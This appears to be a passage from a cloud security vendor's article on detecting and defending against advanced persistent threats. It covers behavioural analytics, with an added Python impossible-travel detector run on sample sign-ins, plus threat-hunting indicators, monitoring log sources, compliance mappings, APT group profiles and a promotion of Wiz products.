UEBA (User and Entity Behavior Analytics) solutions focus on how users, service principals, and machine identities behave. They detect compromised credentials by identifying impossible travel scenarios (logins from geographically distant locations within minutes), abnormal access patterns (users accessing systems outside their normal scope), or sudden spikes in privilege use (such as a developer account suddenly performing administrative operations).
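An impossible-travel check over sign-in records, as an added example (not code from the original article or from Wiz); it also implements the "impossible travel" indicator in the threat-hunting list later in this article. The records are constructed and carry pre-resolved coordinates (in production the source IP is geolocated first); the 900 km/h speed ceiling and the 50 km floor that absorbs geolocation jitter are assumptions:

```python
"""Impossible-travel detection over sign-in events.

Added example for this article; not code from the original page or from Wiz.
Sign-in records are constructed and carry pre-resolved coordinates; the speed
ceiling (roughly commercial air travel) and the jitter floor are assumptions.
"""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 900.0   # faster than this between two sign-ins is not one person
MIN_DISTANCE_KM = 50.0      # below this, geolocation jitter explains the "move"


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    phi1, phi2 = radians(lat1), radians(lat2)
    dphi, dlambda = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlambda / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def impossible_travel(events, max_kmh=MAX_PLAUSIBLE_KMH):
    """One finding per consecutive successful sign-in pair implying travel faster than max_kmh."""
    findings, by_user = [], {}
    for ev in events:
        by_user.setdefault(ev["user"], []).append(ev)
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        for prev, cur in zip(evs, evs[1:]):
            if not (prev["success"] and cur["success"]):
                continue  # only successful sign-ins prove presence somewhere
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if km < MIN_DISTANCE_KM:
                continue
            delta = datetime.fromisoformat(cur["time"]) - datetime.fromisoformat(prev["time"])
            hours = delta.total_seconds() / 3600
            speed = km / hours if hours > 0 else float("inf")
            if speed > max_kmh:
                findings.append({"user": user, "from": prev["city"], "to": cur["city"],
                                 "km": round(km), "hours": round(hours, 2),
                                 "kmh": round(speed), "ip": cur["ip"]})
    return findings


# Constructed sign-in records (documentation IP ranges; coordinates pre-resolved).
SAMPLE_SIGNINS = [
    {"user": "alice", "time": "2025-03-04T09:00:00+00:00", "ip": "192.0.2.10",
     "city": "London", "lat": 51.5074, "lon": -0.1278, "success": True},
    {"user": "alice", "time": "2025-03-04T09:40:00+00:00", "ip": "203.0.113.9",
     "city": "Singapore", "lat": 1.3521, "lon": 103.8198, "success": True},
    {"user": "bob", "time": "2025-03-04T08:00:00+00:00", "ip": "198.51.100.4",
     "city": "New York", "lat": 40.7128, "lon": -74.0060, "success": True},
    {"user": "bob", "time": "2025-03-04T14:00:00+00:00", "ip": "198.51.100.77",
     "city": "Chicago", "lat": 41.8781, "lon": -87.6298, "success": True},
    {"user": "carol", "time": "2025-03-04T10:00:00+00:00", "ip": "198.51.100.4",
     "city": "New York", "lat": 40.7128, "lon": -74.0060, "success": True},
    {"user": "carol", "time": "2025-03-04T10:05:00+00:00", "ip": "203.0.113.50",
     "city": "Moscow", "lat": 55.7558, "lon": 37.6173, "success": False},
]

if __name__ == "__main__":
    for f in impossible_travel(SAMPLE_SIGNINS):
        print(f"{f['user']}: {f['from']} -> {f['to']} in {f['hours']} h ({f['kmh']} km/h) from {f['ip']}")
```

Only alice is reported: London to Singapore in forty minutes. Bob's New York to Chicago hop works out to under 200 km/h, and carol's Moscow attempt failed, so it proves nothing about where she is. Machine identities and VPN egress points break this rule badly (a CI runner legitimately signs in from several regions within seconds), so exclude them or give them their own baseline rather than raising the speed ceiling for everyone.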
Threat Intelligence Integration
Threat intelligence feeds provide up-to-date information about known APT groups, including their tools, techniques, and indicators of compromise. By continuously searching your environment for these indicators—such as malicious IP addresses, file hashes, or domain names—you can uncover ongoing or past APT activity that might otherwise go unnoticed.
Signs You May Have an APT in Your Environment
Watch for these indicators during threat hunting and security reviews:
Cloud Control Plane Anomalies
Unusual role assumptions or privilege escalations outside normal patterns
New IAM users, roles, or service principals created by non-administrative accounts
Modifications to logging configurations or disabled audit trails
Unexpected changes to security groups, firewall rules, or network policies
Creation of new access keys or service account credentials
Identity and Access Indicators
Impossible travel: logins from geographically distant locations within short timeframes
Service principal consents or OAuth app permissions granted outside change windows
Dormant accounts suddenly becoming active
Repeated authentication failures followed by a successful login (password spraying or credential stuffing)
Access to resources outside an identity's normal scope
Network and Data Movement
Unusual east-west traffic between internal systems or cloud accounts
Repeated small data transfers to external destinations (gradual exfiltration)
Connections to newly registered domains or suspicious IP addresses
Encrypted traffic to unusual destinations
Data staging on intermediate systems before external transfer
System and Workload Behavior
Security tools or agents being disabled or modified
Unexpected processes running with elevated privileges
PowerShell, WMI, or other administrative tools executing from unusual parent processes
Container escapes or privilege escalation attempts in Kubernetes
Modifications to startup scripts, scheduled tasks, or persistence mechanisms
Regular threat hunting using these indicators helps reduce dwell time and catch APTs before they achieve their objectives.
Defending against advanced persistent threats
Defending against APTs requires assuming that attackers will eventually get inside your network. Your strategy should focus on limiting what they can do once they're in and detecting them as quickly as possible.
Zero Trust Architecture
Zero Trust, as defined in NIST SP 800-207, eliminates implicit trust for users, devices, and workloads regardless of network location. The model requires continuous verification of identity and device posture, enforcement of least privilege access, and policy-based authorization for every resource request. This approach assumes breach and limits lateral movement by requiring explicit authorization at each access point rather than trusting entities once they're inside the network perimeter.
Network Segmentation
Dividing your network into smaller, isolated segments contains breaches to limited areas. If attackers compromise one segment, they can't easily jump to another without triggering additional security controls. This microsegmentation approach limits the potential damage from any single compromise.
Continuous Security Monitoring
You need around-the-clock monitoring of cloud-specific telemetry to catch APTs in action. Critical log sources include:
AWS: CloudTrail (API activity), VPC Flow Logs (network traffic), GuardDuty (threat detection), Config (configuration changes), CloudWatch Logs (application and system logs)
Azure: Activity Logs (control plane operations), NSG Flow Logs (network traffic), Microsoft Defender for Cloud (threat detection), Azure Monitor (resource logs), Microsoft Entra ID (formerly Azure AD) sign-in and audit logs (identity activity)
GCP: Cloud Audit Logs (admin and data access), VPC Flow Logs (network traffic), Security Command Center (threat detection), Cloud Logging (application logs), Identity and Access Management logs
Real-time analysis of these sources enables detection of control plane abuse, unusual identity behavior, and lateral movement patterns that signal APT activity.
Incident Response Planning
Having a well-defined incident response plan ensures your team knows exactly what to do when they detect an APT. This includes documented playbooks for different attack scenarios, regular practice exercises, and clear authority for the security team to quickly contain threats. Code-to-cloud traceability speeds root cause analysis and prevents recurrence by fixing the source in code or pipelines, not just patching symptoms in production—ensuring the same vulnerability doesn't reappear in the next deployment.
Mapping APT Defenses to Compliance Frameworks
APT defense capabilities satisfy multiple compliance and security framework requirements:
ISO 27001:2022
A.5.24 (Information security incident management planning and preparation)
A.5.25 to A.5.28 (Assessment of events, incident response, learning from incidents, collection of evidence)
A.8.15 (Logging)
A.8.16 (Monitoring activities)
SOC 2 Trust Services Criteria
CC7.2 (System monitoring for anomalies)
CC7.3 (Security incident evaluation and response)
CC7.4 (Incident response program: containment, remediation, and communication)
NIST Cybersecurity Framework
DE.AE (Anomalies and Events detection)
DE.CM (Security Continuous Monitoring)
RS.AN (Analysis of incidents)
RS.MI (Mitigation of incidents)
NIST SP 800-53 Rev. 5
AU (Audit and Accountability) family
AC (Access Control) family
IR (Incident Response) family
SI (System and Information Integrity) family
CIS Controls v8
Control 8 (Audit Log Management)
Control 13 (Network Monitoring and Defense)
Control 17 (Incident Response Management)
NIST SP 800-207 (Zero Trust Architecture)
Continuous verification and authentication
Least privilege access enforcement
Microsegmentation and network isolation
Implementing comprehensive APT defenses demonstrates due diligence and helps organizations meet multiple compliance obligations simultaneously.
Notable APT groups and real-world examples
Security researchers track numerous APT groups, categorizing them by their suspected origins, motivations, and common techniques. Understanding these profiles helps you anticipate the types of threats you're most likely to face.
Nation-State Groups
Government-sponsored APT groups typically focus on geopolitical objectives. They target government agencies, defense contractors, and critical infrastructure sectors to conduct espionage, steal state secrets, or position themselves for future disruptive operations. These groups have substantial resources and patience to achieve their long-term goals.
Financial Crime Groups
Sophisticated criminal organizations use APT tactics for large-scale financial theft. They target banks, financial institutions, and cryptocurrency exchanges with custom malware and complex schemes designed to steal millions of dollars. These groups combine technical sophistication with deep understanding of financial systems.
Cyber Espionage Operations
Corporate espionage groups focus on stealing intellectual property, trade secrets, and proprietary research. The stolen information gives their domestic industries competitive advantages in global markets. These attacks often target technology companies, pharmaceutical firms, and manufacturing organizations with valuable innovations.
Recent Campaign Analysis
APT tactics continue evolving with new technologies. Recent trends include AI-assisted social engineering for more convincing phishing, targeting cloud-native services and identity systems (such as OAuth token theft and service principal abuse), supply chain compromises for widespread impact, living-off-the-land persistence using cloud-native features, and tampering with telemetry by disabling logging services or modifying audit configurations to evade detection. The shift to remote work has also created new attack vectors through home networks and personal devices.
Wiz Defend: Runtime-powered APT detection for cloud environments
Wiz provides agentless visibility across your entire cloud environment in minutes, exposing the hidden relationships and attack paths that APTs exploit to move laterally and establish persistence. By connecting to your cloud through APIs, Wiz scans every resource without impacting performance, ensuring complete coverage and eliminating blind spots where attackers hide.
The Wiz Security Graph identifies toxic combinations of vulnerabilities, misconfigurations, and excessive permissions that create viable attack paths. By visualizing how a public-facing vulnerability could combine with an over-privileged role to access critical data, Wiz helps you proactively close these routes before APTs exploit them.
Wiz Defend combines behavioral analytics with real-time monitoring of cloud audit logs to detect APT activities across your cloud control plane. It alerts on suspicious actions like unusual role assumptions, unexpected security modifications, or attempts to disable logging. These signals help you catch attackers as they try to manipulate your cloud environment.
For workload protection, Wiz's lightweight eBPF-based sensor captures process-level activity that signals active compromise. This includes detecting malware execution, reverse shells for command and control, and container escape attempts. These runtime signals provide definitive evidence that an APT has established a foothold in your workloads.
Wiz Code prevents initial compromise by shifting security into your development lifecycle. It scans code repositories and pipelines for vulnerabilities, infrastructure misconfigurations, and exposed secrets. By catching these risks before deployment, Wiz reduces the attack surface that APTs can target for initial access.
Cloud forensics capabilities correlate events into an Investigation graph and incident timeline, accelerating scoping, blast-radius analysis, and response. By bringing together signals from the cloud control plane, workloads, and network, Wiz helps incident responders understand the full scope of an APT attack—including initial access, lateral movement paths, and data exposure—faster than traditional tools that analyze each layer in isolation.
Request a demo to see how Wiz helps organizations gain the comprehensive visibility and contextual threat detection needed to identify and disrupt sophisticated APT campaigns before they achieve their objectives.